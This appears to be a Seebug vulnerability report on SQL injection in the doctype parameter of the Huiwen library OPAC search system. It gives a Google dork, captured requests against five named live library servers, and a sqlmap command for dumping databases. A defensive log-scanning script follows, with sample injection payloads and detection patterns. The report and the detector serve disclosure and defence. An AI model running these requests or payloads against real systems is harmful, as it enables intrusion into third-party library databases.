Generic SQL injection in a library bibliographic search (OPAC) system

2014-12-05T00:00:00
ID SSV:95272
Type seebug
Reporter Root
Modified 2014-12-05T00:00:00

Description

Brief description:

A library bibliographic search (OPAC) system is affected by a generic SQL injection.

Details:

The Huiwen (汇文) library bibliographic search system has a SQL injection vulnerability. Injection point: the doctype parameter. Google search keyword: inurl:/opac/search.php. The scope of impact is very wide.

[Screenshot: QQ截图20141204130534.png]

1. Visiting http://120.195.143.181:9090/opac/search.php shows that the search form takes several parameters, so the submission was captured:

GET http://120.195.143.181:9090/opac/openlink.php?strText=sssssssssssssss&doctype=ALL&strSearchType=title&match_flag=forward&displaypg=20&sort=CATA_DATE&orderby=desc&showmode=list&location=ALL HTTP/1.1
Host: 120.195.143.181:9090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://120.195.143.181:9090/opac/search.php
Cookie: PHPSESSID=5f90sbejnesoi0l6le8cecrbv0
Connection: keep-alive

The captured request was saved to a txt file and run through sqlmap:

sqlmap.py -r 1s.txt -p "doctype" --dbs --current-user --current-db

[Screenshot: 1.png]

[Screenshot: 2.png]

The other four cases follow.

2. http://202.199.137.66/webphp/opac/search.php

GET http://202.199.137.66/webphp/opac/openlink.php?strSearchType=title&match_flag=forward&historyCount=1&strText=aaaaa&doctype=ALL&with_ebook=on&displaypg=20&showmode=list&sort=CATA_DATE&orderby=desc&location=ALL HTTP/1.1
Host: 202.199.137.66
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.199.137.66/webphp/opac/search.php
Cookie: PHPSESSID=0l65tghtpumq4vo2rt848p5lo3
Connection: keep-alive

[Screenshot: 3.png]

[Screenshot: 4.png]

3. http://opac.wzu.edu.cn/opac/search.php

GET http://opac.wzu.edu.cn/opac/openlink.php?strSearchType=title&match_flag=forward&historyCount=1&strText=ssadad&doctype=ALL&displaypg=20&showmode=list&sort=CATA_DATE&orderby=desc&location=ALL HTTP/1.1
Host: opac.wzu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://opac.wzu.edu.cn/opac/search.php
Cookie: PHPSESSID=kdq1bsidg9nru5uhm6tqqrf7n4
Connection: keep-alive

[Screenshot: 5.png]

[Screenshot: 6.png]

4. http://210.32.33.91:8080/opac/search.php

GET http://210.32.33.91:8080/opac/openlink.php?strSearchType=title&historyCount=1&strText=sssss&x=43&y=4&doctype=ALL&match_flag=any&displaypg=20&sort=CATA_DATE&orderby=desc&showmode=list&dept=ALL HTTP/1.1
Host: 210.32.33.91:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://210.32.33.91:8080/opac/search.php
Cookie: PHPSESSID=hb7u7b05q2phsu880ngp3osij4
Connection: keep-alive

[Screenshot: 7.png]

5. http://219.219.4.7/opac/search.php

GET http://219.219.4.7/opac/openlink.php?historyCount=1&strText=aaaaaaaaaaaaaa&doctype=ALL&strSearchType=title&match_flag=forward&displaypg=20&sort=CATA_DATE&orderby=desc&showmode=list&dept=ALL HTTP/1.1
Host: 219.219.4.7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://219.219.4.7/opac/search.php
Cookie: PHPSESSID=tu4r3phbgh42hhs8s7t7pvl6c6
Connection: keep-alive

[Screenshot: 8.png]
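A defender-side detection example, added here and not part of the original report: the five cases above all inject through the doctype parameter of /opac/openlink.php, which the captured requests only ever send as an enumerated value (doctype=ALL), so an access-log scan can flag doctype values outside a simple allowlist, SQL metacharacters in that parameter, and the sqlmap User-Agent. The log lines, hosts and session ids are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not from the report): one benign
# search, two probe requests against the doctype parameter, one unrelated hit.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Dec/2014:13:05:34 +0800] "GET /opac/openlink.php?strText=sssss&doctype=ALL&strSearchType=title HTTP/1.1" 200 5120 "http://library.example/opac/search.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
10.0.0.9 - - [04/Dec/2014:13:06:01 +0800] "GET /opac/openlink.php?strText=sssss&doctype=ALL%27%20AND%20SLEEP(5)--%20&strSearchType=title HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [04/Dec/2014:13:06:02 +0800] "GET /opac/openlink.php?strText=book&doctype=ALL%22%20OR%201%3D1%23&strSearchType=title HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.7 - - [04/Dec/2014:13:07:10 +0800] "GET /opac/search.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
                    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# doctype is an enumerated selector in every captured request, so a legitimate
# value is a short alphanumeric token; anything else is worth an alert.
ALLOWED_DOCTYPE = re.compile(r'^[A-Za-z0-9_]+$')
SQL_MARKERS = re.compile(r"(['\"]|--|#|/\*|\bsleep\b|\bor\b\s+\d|\bunion\b|\bselect\b)", re.I)

def analyze_line(line):
    """Return an alert dict for a suspicious openlink.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.endswith('/opac/openlink.php'):
        return None
    # parse_qs percent-decodes the values, so the check sees the raw payload
    qs = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for value in qs.get('doctype', []):
        if not ALLOWED_DOCTYPE.match(value):
            reasons.append('doctype outside allowlist: %r' % value)
        if SQL_MARKERS.search(value):
            reasons.append('SQL metacharacters in doctype')
    if 'sqlmap' in m.group('ua').lower():
        reasons.append('sqlmap user-agent')
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'status': m.group('status'), 'reasons': reasons}

def scan_log(text):
    """Scan a whole log and return the list of alerts in file order."""
    return [r for r in (analyze_line(l) for l in text.splitlines()) if r]
```

A 500 response paired with a flagged doctype value is a strong indicator that the injected text reached the database layer.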

Proof of vulnerability:

Proven.